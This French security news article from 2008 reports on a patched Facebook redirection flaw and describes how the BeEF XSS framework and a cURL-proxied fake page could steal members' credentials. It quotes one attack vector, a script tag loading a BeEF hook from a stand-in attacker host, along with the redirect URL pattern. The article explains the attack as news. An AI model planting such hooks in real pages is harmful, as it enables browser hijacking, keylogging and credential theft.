Publié le 08-10-2008 à 12:04:05 dans le thème Réseau - Sécurité

Pays : International - Auteur : Thibaut L.

Pub : CA Anti-Spam 2007 - Bloquez les messages indésirables!

Facebook a corrigé sa faille de redirection qui pouvait permettre le vol des identifiants. Explication et démonstration.

Facebook aura mis moins de 48 heures pour corriger la faille qui visait un "bug" dans son adresse Internet [voir]. La vulnérabilité, découverte par un internaute français du nom de P3lo, permettait de rediriger un internaute vers un espace piégé, un code malicieux [http://www.facebook.com/#//site piegé].

Nous allons vous démontrer que ce type de redirection n'est pas à prendre à légère. Comme nous avions déjà pu vous le prouver avec : La tribune, MSN, Google, Galerie Lafayette, Orange, Meetic, ...

P3lo, le découvreur de cette vulnérabilité a exploité, en plus de la faille Facebook, un outil pas comme les autres baptisé Beef (Boeuf). Beef est un environnement d'exploitation écrit en php. Il va coupler son environnement avec un serveur php comprenant la bibliothèque cURL, un code en php (ou exploit) qui permettait d'appeler Facebook sur son serveur et la redirection en question.

Beef, c'est quoi ?
Vous l'aurez compris, nous ne fournirons pas cet outil, ni un lien de téléchargement en raison de la législation française qui l'interdit. Beef est une application opensource qui permet de créer un environnement en php. Un environnement qui permet d'exploiter différentes failles de types XSS, injection html, et aussi de redirection. A noter que Beef est une application créée en 2007 par une équipe de chercheur en sécurité informatique. Un projet qui avait pour but de démontrer l'impact des failles de type Cross Site Scripting (XSS) sur le navigateur. Aujourd'hui, ce logiciel ne sert plus vraiment de démonstration dans certaines mains.

Beef, une sale vache
Grâce à Beef, et son vecteur d'attaque xss (le vecteur d'attaque est un script permettant de faire appel à Beef, sous la forme script src=http://sitedeboeuf/boeuf/hook/boeuf.js.php>) il est possible de transformer une victime en zombie. Vous l'aurez compris, un prise de contrôle totale de la machine, enregistrer les frappes claviers, envoyer arbitrairement du code, ...

Scénario de l'attaque Facebook
L'attaquant parle avec sa victime et doit le convaincre d'entrer ses données personnelles via la page du nouveau Facebook. Pour cela, une redirection lui a été envoyée. Une fois  la victime piégée, le pirate reçoit les information en temps réel grâce à Beef. Cet outil exploite une bibliothèque cURL. Cette bibliothèque php permet de faire un appel au contenu d'une ressource accessible par un réseau informatique. Dans le cas de Facebook, cURL permettait d'appeler la page originale de Facebook directement sur le site du pirate. Bilan, une utilisation malicieuse de la fonction cURL couplée avec le vecteur d'attaque de Beef et la faille Facebook compromettait ainsi les 100 millions de membres du portail communautaire.

Ces dernières années, les attaques de Cross Site Scripting se sont développées et deviennent de plus en plus dangereuses pour nos ordinateurs et nos informations personnelles. Le moindre script malicieux écrit en javascript peut aboutir à un détournement, qui dépasse le simple vol de cookie classique.

Heureusement, il existe des protections. Pour se protéger des attaques de Beef, il existe Cback CrackerTracker.

Warez + TGI = juste de la malchance

Le TGI de Bonneville n'a pas été piraté. Juste un - problème - d'adressage IP.

6 mois de prison ferme pour avoir piraté Numericable

Un internaute français de 22 ans écope de 6 mois de prison ferme pour avoir piraté le Fournisseur d´Accès à Internet Numericable.

Chasseur de Shell et injection SQL automatisés

20.000 sites piégés par une porte cachée ou une injection SQL. La nouvelle découverte, en 20 minutes chronos, faite par ZATAZ.COM via un logiciel dédié à la chasse aux backdoors.

Université des Correspondants Informatique et Libertés

L´Association Française des Correspondants Informatique et Libertés organise le 21 janvier prochain sa 3ème Université des Correspondants Informatique et Libertés.

Concours Coca Cola 2008

Vous venez de gagner un lot de 32.000 euros via un concours organisé par Coca-Cola. Une arnaque sans sucre.

Fuite de données via Google Bloc-notes

Un commercial de la société Vonage enregistré ses notes et données sensibles sur son espace privé Google Bloc-notes.

Un nouveau ver s'attaque aux réseaux d´entreprise

Une alerte concernant les nouvelles versions du ver Downadup. Ce ver infecte les postes de travail et serveurs Windows.

Espionnage informatique effectué par la police

Le département britannique de l´Intérieur annonce préparer un plan qui permettra à la police d´infiltrer et espionner les ordinateurs personnels de l´ensemble des citoyens.

Warez + TGI = juste de la malchance

Le TGI de Bonneville n'a pas été piraté. Juste un - problème - d'adressage IP.

Chasseur de Shell et injection SQL automatisés

20.000 sites piégés par une porte cachée ou une injection SQL. La nouvelle découverte, en 20 minutes chronos, faite par ZATAZ.COM via un logiciel dédié à la chasse aux backdoors.

Université des Correspondants Informatique et Libertés

L´Association Française des Correspondants Informatique et Libertés organise le 21 janvier prochain sa 3ème Université des Correspondants Informatique et Libertés.

Fuite de données via Google Bloc-notes

Un commercial de la société Vonage enregistré ses notes et données sensibles sur son espace privé Google Bloc-notes.

Mort de Castlecops

Castlecops, association qui travaillait sur la cybercriminalité, vient d´annonce la cessation de ses activités.

Joomla! powa !

Révélation d´informations système sensibles par le biais de Joomla!

Compromission de système par le biais de xterm.

Exécution de commande arbitraire à distance par le biais du terminal xterm.

Déni de service distant pour VMware

DoS sur le démon vmware-authd de VMware Workstation et de VMware Player.

Réagissez à ce contenu